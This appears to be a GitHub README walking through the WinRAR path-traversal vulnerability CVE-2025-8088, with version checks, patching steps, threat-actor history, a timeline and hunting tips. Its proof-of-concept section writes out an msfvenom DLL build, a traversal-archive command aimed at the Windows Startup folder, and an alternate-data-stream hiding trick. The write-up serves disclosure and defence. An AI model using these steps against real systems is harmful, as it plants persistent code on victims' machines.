来源

关联漏洞

描述

An engaging walkthrough on uncovering, patching, and securing the WinRAR CVE-2025-8088 with a hands-on hacker’s twist.

介绍

# **CVE-2025-8088: WinRAR’s Zero-Day Path Traversal — From Zero to Pwn 🗿**

---

## **Intro – The “Old Friend” Just Got Caught Slipping**

WinRAR — the dusty classic everyone has installed but no one updates — just got slapped with a **high-severity zero-day**: **CVE-2025-8088**.

* **Severity:** CVSS v3.1 → 8.8 (High)
* **Exploited in the wild** by threat actors like **RomCom (Storm-0978)** and **Paper Werewolf**.
* **Patched in:** WinRAR **7.13** (released July 30, 2025).
* **If you’re on 7.12 or below — you’re a sitting duck.**

CISA even shoved this into their **Known Exploited Vulnerabilities catalog**, with a **remediation deadline of Sept 2, 2025**. This isn’t just theory — this is **live fire**.

![Cover](https://github.com/user-attachments/assets/b77f956f-95cd-4614-8ac6-dd5fb789d99a) <br/>

---

## **What’s the Bug? 🧩**

* **Type:** Path Traversal (directory traversal)
* **Twist:** Uses **Alternate Data Streams (ADSes)** to hide payloads
* **Impact:** Malicious RAR files can extract stuff *outside* the intended folder — think: `..\Startup\evil.dll`
* **Result:** Arbitrary file placement → persistence → backdoor → RAT city.

Affected: **WinRAR for Windows (≤7.12), UnRAR.dll, Portable UnRAR**
Safe: **Linux, Unix, Android builds**.

---

## **First Things First — Are You Vulnerable? 🕵️‍♂️**

Before panicking or playing hacker, **check your version**.

### How to Check:

* **GUI:** Open WinRAR → `Help → About WinRAR`
* **CMD/Powershell:**

```cmd
winget list WinRAR
```

(or run `winrar.exe` from its install directory)

* **DLL Check:** Right-click `UnRAR.dll` → Properties → Details.

> *When I started writing this, I was on **7.10** — yeah, ripe for the picking 🗿🐔🍗.*

<img width="1920" height="1080" alt="WinRAR_Version" src="https://github.com/user-attachments/assets/19e7b5a7-6096-40e5-90bd-fefeee73fee4" /> <br/>

---

## **How to Patch (Before Someone Patches *You*) 🛡️**

1. Download latest from: [rarlab.com/download.htm](https://www.rarlab.com/download.htm)
2. Choose **64-bit or 32-bit** as per your system.
3. Run installer → it will overwrite your old build.
4. Verify: `Help → About WinRAR` → should read **7.13 or above**.
5. Replace `UnRAR.dll` in dependent tools, if any.

> *WinRAR doesn’t auto-update — set a calendar ping, don’t become a static target.* <br/>

<img width="1920" height="1080" alt="WinRAR_Version_Updated" src="https://github.com/user-attachments/assets/07e00509-504c-40ad-9d76-456d0f98faee" /> <br/>

> *PS: Ignore my wallpaper flex here — had to show off a little! 😏* <br/>

---

## **Exploitation in the Wild ⚔️**

* **RomCom (Storm-0978):** Spear-phishing job application decoys, Ukraine-related targets.
* **Paper Werewolf:** Jumped in shortly after, targeting Russian orgs.
* Delivered payloads: **SnipBot**, **RustyClaw**, Mythic Agent variants.
* Dropped malicious DLLs/LNKs into `%TEMP%` & Startup folders.
* CISA listed it August 12, 2025 → **deadline: Sept 2, 2025**.

---

## **Proof of Concept (PoC) – Controlled Lab Only! 🧨**

> ⚠ **Disclaimer:** This is for **educational & authorized security testing** only. Don’t go full gremlin 🗿.

### Step 1: Generate a Malicious DLL

```bash
msfvenom -p windows/x64/exec CMD=calc.exe -f dll > evil.dll
```

### Step 2: Craft a Traversal RAR

```
winrar a -ep -ap"\\..\\..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" payload.rar evil.dll
```

### Step 3: (Optional) ADS Stealth

```
type evil.dll > legit.txt:evil.dll
```

### Step 4: Extract with Vulnerable WinRAR

Boom — `evil.dll` ends up in Startup. Next reboot? Hello calc.exe.

<img width="1080" height="439" alt="Workflow" src="https://github.com/user-attachments/assets/3005a537-e344-4218-b81c-046d0700fbf9" /> <br/>

---

## **Mitigation & Hunting 🐺**

* Patch → **WinRAR 7.13+**
* Look for suspicious `.dll` or `.lnk` in:

  * `%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup`
  * `%TEMP%`
* Monitor ADS:

  ```powershell
  streams.exe -s C:\
  ```
* IDS/IPS rule: flag RAR with `..\` sequences.
* Nessus/Qualys plugins already live.

---

## **Key Timeline**

* **July 18, 2025** – ESET discovers active exploitation
* **July 30, 2025** – Patch released (7.13)
* **August 12, 2025** – Added to CISA KEV Catalog
* **Sept 2, 2025** – Mandatory remediation deadline for federal agencies

---

## **Final Words – Patch or Perish 🗿**

This wasn’t a “maybe-one-day” vuln — this was **weaponized before disclosure**.
If you’re still sitting on 7.10 (like I was when writing this), patch now.
If you’re on the red team side, treat this as a **case study in how old tools become new attack vectors.**

---

文件快照

 [4.0K]  /data/pocs/8f9d324faffb814764e05382a23a6e7a18c01489
├── [1.0K]  LICENSE
└── [4.7K]  README.md

0 directories, 2 files

备注